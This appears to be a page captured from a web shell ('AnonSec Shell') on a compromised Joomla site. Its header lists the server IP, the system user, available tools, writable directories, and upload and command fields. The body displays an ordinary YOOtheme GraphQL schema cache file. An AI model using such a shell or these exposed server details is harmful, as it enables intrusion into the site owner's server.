AnonSec Shell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.117
Web Server : Apache
System : Linux webm013.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : coopiak ( 151928)
PHP Version : 8.3.23
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/coopiak/amisdesseniors-fr/nice2/templates/yootheme/cache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/coopiak/amisdesseniors-fr/nice2/templates/yootheme/cache/schema-1.gql
directive @bind(id: String, class: String, args: String) on OBJECT | ENUM_VALUE | FIELD_DEFINITION

directive @call(func: String, args: String) on ENUM_VALUE | FIELD_DEFINITION

directive @slice(offset: Int, limit: Int) on FIELD | FRAGMENT_SPREAD | INLINE_FRAGMENT

type Query {
  search: Search @call(func: "YOOtheme\\Builder\\Joomla\\Search\\Type\\SearchQueryType::resolve")
  searchItems(offset: Int, limit: Int): [SearchItem] @call(func: "YOOtheme\\Builder\\Joomla\\Search\\Type\\SearchItemsQueryType::resolve")
  site: Site @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\SiteQueryType::resolve")
  article: Article @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleQueryType::resolve")
  prevArticle: Article @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleQueryType::resolvePreviousArticle")
  nextArticle: Article @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleQueryType::resolveNextArticle")
  category: Category @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CategoryQueryType::resolve")
  contact: Contact @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ContactQueryType::resolve")
  articlesSingle(offset: Int): Article @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticlesQueryType::resolveSingle")
  articles(offset: Int, limit: Int): [Article] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticlesQueryType::resolve")
  smartSearch: SmartSearch @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\SmartSearchQueryType::resolve")
  smartSearchItems(offset: Int, limit: Int): [SmartSearchItem] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\SmartSearchItemsQueryType::resolve")
  tagsSingle(offset: Int): Tag @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagsQueryType::resolveSingle")
  tags(offset: Int, limit: Int): [Tag] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagsQueryType::resolve")
  tagItemsSingle(offset: Int): TagItem @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagItemsQueryType::resolveSingle")
  tagItems(offset: Int, limit: Int): [TagItem] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagItemsQueryType::resolve")
  customArticle(id: String, catid: [String], include_child_categories: String, cat_operator: String, tags: [String], include_child_tags: String, tag_operator: String, users: [String], users_operator: String, featured: String, offset: Int, order: String, order_direction: String, order_alphanum: Boolean): Article @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CustomArticleQueryType::resolve")
  customArticles(catid: [String], cat_operator: String, include_child_categories: String, tags: [String], tag_operator: String, include_child_tags: String, users: [String], users_operator: String, featured: String, offset: Int, limit: Int, order: String, order_direction: String, order_alphanum: Boolean): [Article] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CustomArticlesQueryType::resolve")
  customCategory(id: String): Category @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CustomCategoryQueryType::resolve")
  customCategories(catid: String, offset: Int, limit: Int, order: String, order_direction: String): [Category] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CustomCategoriesQueryType::resolve")
  customTag(id: String): Tag @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CustomTagQueryType::resolve")
  customTags(parent_id: String, offset: Int, limit: Int, order: String, order_direction: String): [Tag] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CustomTagsQueryType::resolve")
  customMenuItem(menu: String, id: String): MenuItem @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CustomMenuItemQueryType::resolve")
  customMenuItems(id: String, parent: String, heading: String, include_heading: Boolean = true, ids: [String]): [MenuItem] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CustomMenuItemsQueryType::resolve")
  customUser(id: String): User @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CustomUserQueryType::resolve")
  customUsers(groups: [String], offset: Int, limit: Int, order: String, order_direction: String): [User] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CustomUsersQueryType::resolve")
  ad(id: String): Ad @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdQueryType::resolve")
  gallery(offset: Int, limit: Int): [AdGallery] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdGalleryQueryType::resolve")
  extraFields(item_id: String, fids: [String]): [AdFields] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdFieldsQueryType::resolve")
  events(userAds: Boolean, ordering: String, ignore_pagination: Boolean): [Ad] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdsQueryType::resolve")
  profile(id: String): Profile @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileQueryType::resolve")
  profiles(showFavorite: Boolean): [Profile] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfilesQueryType::resolve")
  plans: [DJCFPlan] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlansQueryType::resolve")
  categoriesAd: [CategoryAd] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CategoriesQueryType::resolve")
  customAds(follow_category: Boolean, hide_current_ad: Boolean, catid: [String], cat_operator: String, regions: [String], regions_operator: String, types: [Int], types_operator: String, users: [String], users_operator: String, p_first: Boolean, p_bold: Boolean, p_border: Boolean, p_background: Boolean, p_special: Boolean, only_auction: Boolean, offset: Int, limit: Int, order: String, order_direction: String, order_alphanum: Boolean): [Ad] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\CustomAdsQueryType::resolve")
  customDJCFProfiles(groups: [Int], groups_operator: String, ug: [Int], ug_operator: String, users: [String], users_operator: String, verified: Boolean, offset: Int, limit: Int, order: String, order_direction: String, order_alphanum: Boolean): [Profile] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\CustomProfilesQueryType::resolve")
  customDJCFCategories(catid: [String], cat_operator: String, users: [String], users_operator: String, featured: Boolean, offset: Int, limit: Int, order: String, order_direction: String, order_alphanum: Boolean): [CategoryAd] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CustomCategoryQueryType::resolve")
  customRegions(cids: [Int], cid_operator: String, users: [String], users_operator: String, offset: Int, order: String, order_direction: String, limit: Int): [AdRegion] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Region\\CustomRegionsQueryType::resolve")
  customPlans(pid: [Int]): [DJCFPlan] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\CustomPlansQueryType::resolve")
  file(pattern: String, offset: Int, order: String, order_direction: String): File @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileQueryType::resolve")
  files(pattern: String, offset: Int, limit: Int, order: String, order_direction: String): [File] @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FilesQueryType::resolve")
}

type Search {
  searchword: String
  total: Int
  error: String
}

type SearchItem {
  title: String
  text: String
  created: String @call(func: "YOOtheme\\Builder\\Joomla\\Search\\Type\\SearchItemType::created")
  category: Category @call(func: "YOOtheme\\Builder\\Joomla\\Search\\Type\\SearchItemType::category")
  href: String
}

type Category {
  title: String
  description: String
  numitems: String
  params: CategoryParams @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CategoryType::params")
  link: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CategoryType::link")
  tagString(parent_id: String, separator: String, show_link: Boolean, link_style: String): String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CategoryType::tagString")
  parent: Category @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CategoryType::parent")
  categories: [Category] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CategoryType::categories")
  articles(subcategories: Boolean, offset: Int, limit: Int, order: String, order_direction: String, order_alphanum: Boolean): [Article] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CategoryType::articles")
  tags(parent_id: String): [Tag] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\CategoryType::tags")
  alias: String
  id: String
}

type CategoryParams {
  image: String
  image_alt: String
}

type Article {
  title: String
  content(show_intro_text: Boolean): String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::content")
  teaser(show_excerpt: Boolean): String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::teaser")
  publish_up: String
  created: String
  modified: String
  featured: Boolean
  metaString(format: String, separator: String, link_style: String, show_publish_date: Boolean, show_author: Boolean, show_taxonomy: String, parent_id: String, date_format: String): String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::metaString")
  tagString(parent_id: String, separator: String, show_link: Boolean, link_style: String): String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::tagString")
  images: ArticleImages @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::images")
  link: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::link")
  hits: String
  urls: ArticleUrls @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::urls")
  event: ArticleEvent @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::event")
  category: Category @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::category")
  author: User @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::author")
  tags(parent_id: String): [Tag] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::tags")
  rating: String
  rating_count: String
  alias: String
  id: String
  relatedArticles(category: String, tags: String, author: String, offset: Int, limit: Int, order: String, order_direction: String, order_alphanum: Boolean): [Article] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleType::relatedArticles")
  field: ArticleFields @call(func: "YOOtheme\\Builder\\Joomla\\Fields\\Type\\FieldsType::field")
}

type ArticleImages {
  image_intro: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ImagesType::image")
  image_intro_alt: String
  image_intro_caption: String
  image_fulltext: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ImagesType::image")
  image_fulltext_alt: String
  image_fulltext_caption: String
}

type ArticleUrls {
  urla: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleUrlsType::resolve")
  urlatext: String
  urlb: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleUrlsType::resolve")
  urlbtext: String
  urlc: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleUrlsType::resolve")
  urlctext: String
}

type ArticleEvent {
  afterDisplayTitle: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleEventType::resolve")
  beforeDisplayContent: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleEventType::resolve")
  afterDisplayContent: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ArticleEventType::resolve")
}

type User {
  name: String
  username: String
  email: String
  registerDate: String
  lastvisitDate: String
  link: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\UserType::link")
  userGroupString(separator: String): String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\UserType::userGroupString")
  id: String
  field: UserFields @call(func: "YOOtheme\\Builder\\Joomla\\Fields\\Type\\FieldsType::field")
}

type UserFields @bind(id: "User.fields", class: "YOOtheme\\Builder\\Joomla\\Fields\\Type\\FieldsType", args: "{\"$context\":\"com_users.user\"}") {
  image: MediaField @call(func: "User.fields@resolve")
  image_alt_text: String @call(func: "User.fields@resolve")
  description: String @call(func: "User.fields@resolve")
  job_title: String @call(func: "User.fields@resolve")
  socials: [FieldSocials] @call(func: "User.fields@resolve")
}

type MediaField {
  imagefile: String
  alt_text: String
}

type FieldSocials {
  title: String @call(func: "User.fields@resolveSubfield", args: "{\"context\":\"com_users.user\",\"id\":10}")
  link: String @call(func: "User.fields@resolveSubfield", args: "{\"context\":\"com_users.user\",\"id\":11}")
}

type Tag {
  title: String
  description: String
  images: Images @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagType::images")
  hits: String
  link: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagType::link")
  tags: [Tag] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagType::tags")
  items(include_children: Boolean, typesr: [String], offset: Int, limit: Int, order: String, order_direction: String, order_alphanum: Boolean): [TagItem] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagType::items")
  alias: String
  id: String
}

type Images {
  image_intro: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ImagesType::image")
  image_intro_alt: String
  image_intro_caption: String
  image_fulltext: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ImagesType::image")
  image_fulltext_alt: String
  image_fulltext_caption: String
}

type TagItem {
  core_title: String
  content: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagItemType::content")
  teaser(show_excerpt: Boolean): String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagItemType::teaser")
  core_publish_up: String
  core_created_time: String
  core_modified_time: String
  metaString(format: String, separator: String, link_style: String, show_publish_date: Boolean, show_author: Boolean, show_taxonomy: String, parent_id: String, date_format: String): String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagItemType::metaString")
  images: Images @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagItemType::images")
  link: String
  event: ArticleEvent @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagItemType::event")
  category: Category @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagItemType::category")
  author: User @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\TagItemType::author")
  core_alias: String
  id: String
  content_type_title: String
  field: ArticleFields @call(func: "YOOtheme\\Builder\\Joomla\\Fields\\Type\\FieldsType::field")
}

type ArticleFields @bind(id: "Article.fields", class: "YOOtheme\\Builder\\Joomla\\Fields\\Type\\FieldsType", args: "{\"$context\":\"com_content.article\"}") {
  teaser_image: MediaField @call(func: "Article.fields@resolve")
  teaser_image_alt_text: String @call(func: "Article.fields@resolve")
}

type Site {
  title: String
  page_title: String
  page_locale: String @call(func: "YOOtheme\\Builder\\Source\\Type\\SiteType::resolvePageLocale")
  page_url(query: Boolean): String @call(func: "YOOtheme\\Builder\\Source\\Type\\SiteType::resolvePageUrl")
  user: User
  is_guest: Int
  cf_site_url_cat_name: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Helper\\CategoriesHelper::cf_site_url_cat_name")
  cf_site_url_cat_desc: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Helper\\CategoriesHelper::cf_site_url_cat_desc")
  cf_site_url_reg_name: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Helper\\RegionHelper::cf_site_url_reg_name")
}

type Contact {
  name: String
  image: String
  email_to: String
  con_position: String
  address: String
  suburb: String
  state: String
  postcode: String
  country: String
  telephone: String
  mobile: String
  fax: String
  webpage: String
  text: String
  hits: String
  category: Category @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ContactType::category")
  user: User @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ContactType::user")
  tags: [Tag] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ContactType::tags")
  tagString(separator: String, show_link: Boolean, link_style: String): String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ContactType::tagString")
  created: String
  modified: String
  link: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ContactType::link")
  articles: [Article] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\ContactType::articles")
  alias: String
  id: String
}

type SmartSearch {
  searchword: String
  total: Int
}

type SmartSearchItem {
  title: String
  description: String
  publish_start_date: String
  metaString(format: String, separator: String, link_style: String, show_publish_date: Boolean, show_author: Boolean, show_taxonomy: String, parent_id: String, date_format: String): String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\SmartSearchItemType::metaString")
  images: ArticleImages @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\SmartSearchItemType::images")
  category: Category @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\SmartSearchItemType::category")
  author: User @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\SmartSearchItemType::author")
  route: String
}

type MenuItem {
  title: String
  image: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\MenuItemType::data")
  icon: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\MenuItemType::data")
  subtitle: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\MenuItemType::data")
  link: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\MenuItemType::link")
  active: Boolean @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\MenuItemType::active")
  type: String @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\MenuItemType::type")
  parent: MenuItem @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\MenuItemType::parent")
  children: [MenuItem] @call(func: "YOOtheme\\Builder\\Joomla\\Source\\Type\\MenuItemType::children")
  alias: String
  id: String
}

type Ad {
  id: String
  name: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::name")
  alias: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::alias")
  introDescription: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::introDescription")
  description: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::description")
  startTime: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::startTime")
  startTimeAgo: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::startTimeAgo")
  renewTime: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::renewTime")
  renewTimeAgo: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::renewTimeAgo")
  endTime: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::endTime")
  price: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::price")
  price_negotiable: String
  website: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::website")
  video: String
  contact: String
  address: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::address")
  postCode: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::postCode")
  latitude: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::latitude")
  longitude: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::longitude")
  latitudeLongitude: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::latitudeLongitude")
  email: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::email")
  hits: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::hits")
  published: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::published")
  blocked: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::blocked")
  expired: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::expired")
  archived: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::archived")
  paid: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::paid")
  isNew: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::isNew")
  isAuction: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::isAuction")
  createdBy: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::createdBy")
  linkToAd: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::linkToAd")
  categoryName: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::categoryName")
  typeName: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::typeName")
  linkToCategory: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::linkToCategory")
  firstImage: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::firstImage")
  thumbnailM: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::thumbnailM")
  thumbnail: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::thumbnail")
  promotions: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::promotions")
  editLink: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::editLink")
  publishLink: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::publishLink")
  deleteLink: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::deleteLink")
  blockActivateLink: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::blockActivateLink")
  renewLink: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::renewLink")
  distance: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::distance")
  map: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::map")
  type: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::type")
  new: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::new_label")
  html_price: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::html_price")
  html_comments: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::html_comments")
  social_code: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::social_icons")
  favorite: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::favorite")
  buynowForm: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::buynowForm")
  auctionForm: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::auctionForm")
  auctionTimer: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::auctionTimer")
  author: Profile @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::author")
  category: CategoryAd @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::category")
  location: AdRegion @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::location")
  locationProfile: AdRegion @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::locationProfile")
  images(offset: Int, limit: Int): [AdGallery] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::images")
  extraFields(fids: [String]): [AdFields] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::extraFields")
  relatedAds(category: String, tags: String, author: String, region: String, types: String, p_first: Boolean, p_bold: Boolean, p_border: Boolean, p_background: Boolean, p_special: Boolean, offset: Int, limit: Int, distance: Int, order: String, order_direction: String, order_alphanum: Boolean, catids: [String]): [Ad] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::relatedAds")
  rating: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::rating")
  bathrooms: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":1,\"name\":\"bathrooms\",\"label\":\"Bathrooms\",\"type\":\"inputbox\",\"group_name\":null}}")
  area: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":2,\"name\":\"area\",\"label\":\"Area\",\"type\":\"inputbox\",\"group_name\":null}}")
  yearbuilt: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":3,\"name\":\"yearbuilt\",\"label\":\"Year built\",\"type\":\"inputbox\",\"group_name\":null}}")
  lotsize: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":4,\"name\":\"lotsize\",\"label\":\"Lot size\",\"type\":\"inputbox\",\"group_name\":null}}")
  furnished: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":5,\"name\":\"furnished\",\"label\":\"Furnished\",\"type\":\"radio\",\"group_name\":null}}")
  garage: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":6,\"name\":\"garage\",\"label\":\"Garage\",\"type\":\"radio\",\"group_name\":null}}")
  size: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":9,\"name\":\"size\",\"label\":\"Size\",\"type\":\"selectlist\",\"group_name\":null}}")
  brand: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":10,\"name\":\"brand\",\"label\":\"Brand\",\"type\":\"textarea\",\"group_name\":null}}")
  mileage: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":12,\"name\":\"mileage\",\"label\":\"Mileage\",\"type\":\"inputbox\",\"group_name\":null}}")
  model: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":13,\"name\":\"model\",\"label\":\"Model\",\"type\":\"inputbox\",\"group_name\":null}}")
  fuel_type: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":14,\"name\":\"fuel_type\",\"label\":\"Fuel type\",\"type\":\"inputbox\",\"group_name\":null}}")
  frame: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":15,\"name\":\"frame\",\"label\":\"Frame\",\"type\":\"selectlist\",\"group_name\":null}}")
  wheel_size: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":16,\"name\":\"wheel_size\",\"label\":\"Wheel size\",\"type\":\"selectlist\",\"group_name\":null}}")
  type_of_hobby: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":17,\"name\":\"type_of_hobby\",\"label\":\"Type of hobby\",\"type\":\"selectlist\",\"group_name\":null}}")
  electronics_type: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":18,\"name\":\"electronics_type\",\"label\":\"Electronics type\",\"type\":\"selectlist\",\"group_name\":null}}")
  photos: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field", args: "{\"field\":{\"id\":19,\"name\":\"photos\",\"label\":\"photos\",\"type\":\"image\",\"group_name\":null}}")
